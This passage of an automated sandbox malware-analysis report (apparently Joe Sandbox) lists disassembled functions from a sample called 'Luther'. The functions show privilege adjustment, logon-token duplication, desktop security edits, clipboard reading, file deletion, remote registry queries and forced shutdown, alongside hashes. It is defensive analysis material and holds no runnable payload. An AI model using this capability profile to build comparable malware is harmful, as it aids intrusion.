Part of subcall function 00E9DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E9DD2C
Part of subcall function 00E9DC54: FindClose.KERNEL32(00000000), ref: 00E9DD43

GetLastError.KERNEL32 ref: 00EA666E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 9545c32554b55dd587de7ba39759ec69ab9a4ed262d4a489da582409f18e5b35
Instruction ID: 9cbe44b9e97845027909022d9fd70b200a10528aa848741a26cfb2e916ac73e2
Opcode Fuzzy Hash: 9545c32554b55dd587de7ba39759ec69ab9a4ed262d4a489da582409f18e5b35
Instruction Fuzzy Hash: A7F0A0362046109FCB10EF59D849F6EBBE5EF88720F048419F949AB352CB75BC02CB91

Non-executed Functions

Function 00E91B4D Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00E92010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9205A
Part of subcall function 00E92010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E92087
Part of subcall function 00E92010: GetLastError.KERNEL32 ref: 00E92097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E91BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E91BF4
CloseHandle.KERNEL32(?), ref: 00E91C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E91C1D
GetProcessWindowStation.USER32 ref: 00E91C36
SetProcessWindowStation.USER32(00000000), ref: 00E91C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E91C5C

Part of subcall function 00E91A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E91B48), ref: 00E91A20
Part of subcall function 00E91A0B: CloseHandle.KERNEL32(?,?,00E91B48), ref: 00E91A35

Strings

default, xrefs: 00E91C57
j, xrefs: 00E91CDE
winsta0, xrefs: 00E91C18
, xrefs: 00E91BA6

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$j
API String ID: 22674027-2615587742
Opcode ID: 7bc57d44630672c7dddbb64c26e4f26392f4c6f6e6a9bc94375b11e3ffda4d2e
Instruction ID: bcd33a45d64409473820ae09f669a0fceb40383dac691f187161027c117cf8f4
Opcode Fuzzy Hash: 7bc57d44630672c7dddbb64c26e4f26392f4c6f6e6a9bc94375b11e3ffda4d2e
Instruction Fuzzy Hash: F1819B7190520ABFDF119FA5CC49FEE7BB8EF08309F1450A9F914B61A0D772895ACB60

Function 00E914AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E91A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91A60
Part of subcall function 00E91A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A6C
Part of subcall function 00E91A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A7B
Part of subcall function 00E91A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E914E7,?,?,?), ref: 00E91A82
Part of subcall function 00E91A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E91A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E91518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E9154C
GetLengthSid.ADVAPI32(?), ref: 00E91563
GetAce.ADVAPI32(?,00000000,?), ref: 00E9159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E915B9
GetLengthSid.ADVAPI32(?), ref: 00E915D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E915D8
HeapAlloc.KERNEL32(00000000), ref: 00E915DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E91600
CopySid.ADVAPI32(00000000), ref: 00E91607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E91636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E91658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E9166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E91691
HeapFree.KERNEL32(00000000), ref: 00E91698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E916A1
HeapFree.KERNEL32(00000000), ref: 00E916A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E916B1
HeapFree.KERNEL32(00000000), ref: 00E916B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00E916C4
HeapFree.KERNEL32(00000000), ref: 00E916CB

Part of subcall function 00E91ADF: GetProcessHeap.KERNEL32(00000008,00E914FD,?,00000000,?,00E914FD,?), ref: 00E91AED
Part of subcall function 00E91ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E914FD,?), ref: 00E91AF4
Part of subcall function 00E91ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E914FD,?), ref: 00E91B03

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 77f9013f430a23a58159cead6be86329d2a6b4d1335572e2c6e9b68416763040
Instruction ID: ce5a59b58a4fd0e5d8a1017869ab7d99e1328ff50290590a5edfa0ecce9750fb
Opcode Fuzzy Hash: 77f9013f430a23a58159cead6be86329d2a6b4d1335572e2c6e9b68416763040
Instruction Fuzzy Hash: 62717BB290020AAFDF10DFA5DC45FEEBBB9BF04314F094565E915B6191D7329906CBA0

Function 00EAF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00ECDCD0), ref: 00EAF586
IsClipboardFormatAvailable.USER32(0000000D), ref: 00EAF594
GetClipboardData.USER32(0000000D), ref: 00EAF5A0
CloseClipboard.USER32 ref: 00EAF5AC
GlobalLock.KERNEL32(00000000), ref: 00EAF5E4
CloseClipboard.USER32 ref: 00EAF5EE
GlobalUnlock.KERNEL32(00000000), ref: 00EAF619
IsClipboardFormatAvailable.USER32(00000001), ref: 00EAF626
GetClipboardData.USER32(00000001), ref: 00EAF62E
GlobalLock.KERNEL32(00000000), ref: 00EAF63F
GlobalUnlock.KERNEL32(00000000), ref: 00EAF67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 00EAF695
GetClipboardData.USER32(0000000F), ref: 00EAF6A1
GlobalLock.KERNEL32(00000000), ref: 00EAF6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00EAF6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EAF6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EAF72F
GlobalUnlock.KERNEL32(00000000), ref: 00EAF750
CountClipboardFormats.USER32 ref: 00EAF771
CloseClipboard.USER32 ref: 00EAF7B6

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 01be18d2b5653c5db58e8e177dd44bb39bcdc9db5e15139943379a2e2f4001e4
Instruction ID: 310b75c0314675d25b9eefbacea5002700f50cfc994ddea82658875cc34113f6
Opcode Fuzzy Hash: 01be18d2b5653c5db58e8e177dd44bb39bcdc9db5e15139943379a2e2f4001e4
Instruction Fuzzy Hash: 2561A5351042019FD300EF61DC89F6ABBE4AF89708F14557DF446AB2A2DB32ED4ACB61

Function 00EA73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00EA7403
FindClose.KERNEL32(00000000), ref: 00EA7457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EA7493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EA74BA

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA74F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00EA7524

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00EA75AF
%4d, xrefs: 00EA75F6
%03d, xrefs: 00EA77E7
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00EA7577
%02d, xrefs: 00EA7645, 00EA764F, 00EA769F, 00EA76EF, 00EA773F, 00EA778F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 51b28b0cefce68645718d8422273a2a59c6346871293ce1df83b6286206d7f48
Instruction ID: fb9f51b70b20a687c4e25f6bd83500652b4970189ca0132a387eefaf426d0960
Opcode Fuzzy Hash: 51b28b0cefce68645718d8422273a2a59c6346871293ce1df83b6286206d7f48
Instruction Fuzzy Hash: DFD16172508304AEC314EB64CC45EBBBBECAF88704F40592DF589E6291EB75EA44C762

Function 00EAA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00EAA0A8
GetFileAttributesW.KERNEL32(?), ref: 00EAA0E6
SetFileAttributesW.KERNEL32(?,?), ref: 00EAA100
FindNextFileW.KERNEL32(00000000,?), ref: 00EAA118
FindClose.KERNEL32(00000000), ref: 00EAA123
FindFirstFileW.KERNEL32(*.*,?), ref: 00EAA13F
SetCurrentDirectoryW.KERNEL32(?), ref: 00EAA18F
SetCurrentDirectoryW.KERNEL32(00EF7B94), ref: 00EAA1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAA1B7
FindClose.KERNEL32(00000000), ref: 00EAA1C4
FindClose.KERNEL32(00000000), ref: 00EAA1D4

Strings

*.*, xrefs: 00EAA13A

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 68ed5d4b854c6e8453ff9f572e83cf72b98bbe756a6fab1c185d6a2ca1934250
Instruction ID: ab00958f42df2c67075e1fa5d9b3029344ad6947de72b790ab8049a6dbb6d51f
Opcode Fuzzy Hash: 68ed5d4b854c6e8453ff9f572e83cf72b98bbe756a6fab1c185d6a2ca1934250
Instruction Fuzzy Hash: 8131F47260531D7EDB14AFA5DC49EDE77AC9F1A324F0410B5E810F6090EB71EE49CA51

Function 00EA4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EA4785
_wcslen.LIBCMT ref: 00EA47B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 00EA47E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EA4803
RemoveDirectoryW.KERNEL32(?), ref: 00EA4813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EA489A
CloseHandle.KERNEL32(00000000), ref: 00EA48A5
CloseHandle.KERNEL32(00000000), ref: 00EA48B0

Strings

:, xrefs: 00EA47C7
\, xrefs: 00EA47BC
\??\%s, xrefs: 00EA47A0

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: e61eb8f0241e655de5d6cf5033cb48e4cb1cf7a3b475858c9e88d7265dd3d5f7
Instruction ID: 64752d8202feb326a5f0e4b955c5a1f297292b23d0f358ecaa8f271b533537c0
Opcode Fuzzy Hash: e61eb8f0241e655de5d6cf5033cb48e4cb1cf7a3b475858c9e88d7265dd3d5f7
Instruction Fuzzy Hash: F531E5B1504149AFDB209BA4DC44FEF33BCEF89705F1040B6F509F60A0E7B596458B20

Function 00EAA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00EAA203
FindNextFileW.KERNEL32(00000000,?), ref: 00EAA25E
FindClose.KERNEL32(00000000), ref: 00EAA269
FindFirstFileW.KERNEL32(*.*,?), ref: 00EAA285
SetCurrentDirectoryW.KERNEL32(?), ref: 00EAA2D5
SetCurrentDirectoryW.KERNEL32(00EF7B94), ref: 00EAA2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAA2FD
FindClose.KERNEL32(00000000), ref: 00EAA30A
FindClose.KERNEL32(00000000), ref: 00EAA31A

Part of subcall function 00E9E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E9E3B4

Strings

*.*, xrefs: 00EAA280

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 9159f3370cd9165959cdffde77f5bfe72f02068f0e81011e2c0a2fb7b56dd6a6
Instruction ID: 1d94ae52dda4d483f98973cb76a1d034235bb783532072a3a67570efa3182306
Opcode Fuzzy Hash: 9159f3370cd9165959cdffde77f5bfe72f02068f0e81011e2c0a2fb7b56dd6a6
Instruction Fuzzy Hash: 9631F83250431D6ECF10AFA5DC09EDE77AD9F4A324F1451B5E810B71A0EB32EE99CA61

Function 00EBC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBC10E,?,?), ref: 00EBD415
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD451
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4C8
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBC99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00EBCA09
RegCloseKey.ADVAPI32(00000000), ref: 00EBCA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EBCA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EBCB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EBCBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EBCC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00EBCC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EBCD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EBCDE2
RegCloseKey.ADVAPI32(00000000), ref: 00EBCDEF

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 1281c9b75a400c64cb539d3092f2d62e87650a8aedcaa1c25a13aa9c1e6e724e
Instruction ID: b5cfbf72348e7536651f7b33d726b078b19e065c0028dcd2534c611d106b3805
Opcode Fuzzy Hash: 1281c9b75a400c64cb539d3092f2d62e87650a8aedcaa1c25a13aa9c1e6e724e
Instruction Fuzzy Hash: D60263756082009FD714DF28C895E6ABBE5FF48308F1894ADF44AEB2A2D731ED46CB51

Function 00E9D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E355D1,?,?,00E74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E35871

Part of subcall function 00E9EAB0: GetFileAttributesW.KERNEL32(?,00E9D840), ref: 00E9EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00E9D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E9DA88
MoveFileW.KERNEL32(?,?), ref: 00E9DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 00E9DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E9DAE2

Part of subcall function 00E9DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E9DAC7,?,?), ref: 00E9DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 00E9DAFE
FindClose.KERNEL32(00000000), ref: 00E9DB0F

Strings

\*.*, xrefs: 00E9D978, 00E9D981, 00E9D996

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: f6f31156c3430c3e7d55f23a3971afb63854dde8589f2cc1e8f3a46ed5c64d78
Instruction ID: 910f53dc502c7077241f5b6506430a9ec2c1b00090fd4e28f28556f72b7c43e5
Opcode Fuzzy Hash: f6f31156c3430c3e7d55f23a3971afb63854dde8589f2cc1e8f3a46ed5c64d78
Instruction Fuzzy Hash: 1B615E3180911DAECF05EBA0DD969EDBBB5AF14304F6061A9E502771A1EB726F09CB60

Function 00EAF7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00EAF7EE
EmptyClipboard.USER32 ref: 00EAF7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 00EAF809
CloseClipboard.USER32 ref: 00EAF900

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 842f756e9a10b755da0898b54a3211d4ec51bd5fc5b3730a5f6650e30f138675
Instruction ID: 51dbd6c2e1e5f0a7e0953ae4fb069be2d4401998c9188cbef41a32406ba8c9af
Opcode Fuzzy Hash: 842f756e9a10b755da0898b54a3211d4ec51bd5fc5b3730a5f6650e30f138675
Instruction Fuzzy Hash: A4418B31604601AFD314CF55D888F55BBE4EF49319F1484B9E859AF662CB36FC42CB90

Function 00E9F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00E92010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9205A
Part of subcall function 00E92010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E92087
Part of subcall function 00E92010: GetLastError.KERNEL32 ref: 00E92097

ExitWindowsEx.USER32(?,00000000), ref: 00E9F249

Strings

, xrefs: 00E9F237
SeShutdownPrivilege, xrefs: 00E9F219
@, xrefs: 00E9F23C
, xrefs: 00E9F273

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: ec6d5a810ed0ca8deba1f3410bcea7e739434f34a8ea52dfe3a265789107a40e
Instruction ID: 25d7b486567e43330c4b0c3bbc00851ca37512fa9dc453ad709d269a70289b08
Opcode Fuzzy Hash: ec6d5a810ed0ca8deba1f3410bcea7e739434f34a8ea52dfe3a265789107a40e
Instruction Fuzzy Hash: E901F97A6142146FEF1463B89C8AFFF72AC9B08354F151535FD12F21F2D5615D059190

Function 00EA3A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E756C2,?,?,00000000,00000000), ref: 00EA3A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E756C2,?,?,00000000,00000000), ref: 00EA3A35
LoadResource.KERNEL32(?,00000000,?,?,00E756C2,?,?,00000000,00000000,?,?,?,?,?,?,00E366CE), ref: 00EA3A45
SizeofResource.KERNEL32(?,00000000,?,?,00E756C2,?,?,00000000,00000000,?,?,?,?,?,?,00E366CE), ref: 00EA3A56
LockResource.KERNEL32(00E756C2,?,?,00E756C2,?,?,00000000,00000000,?,?,?,?,?,?,00E366CE,?), ref: 00EA3A65

Strings

SCRIPT, xrefs: 00EA3A2B

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
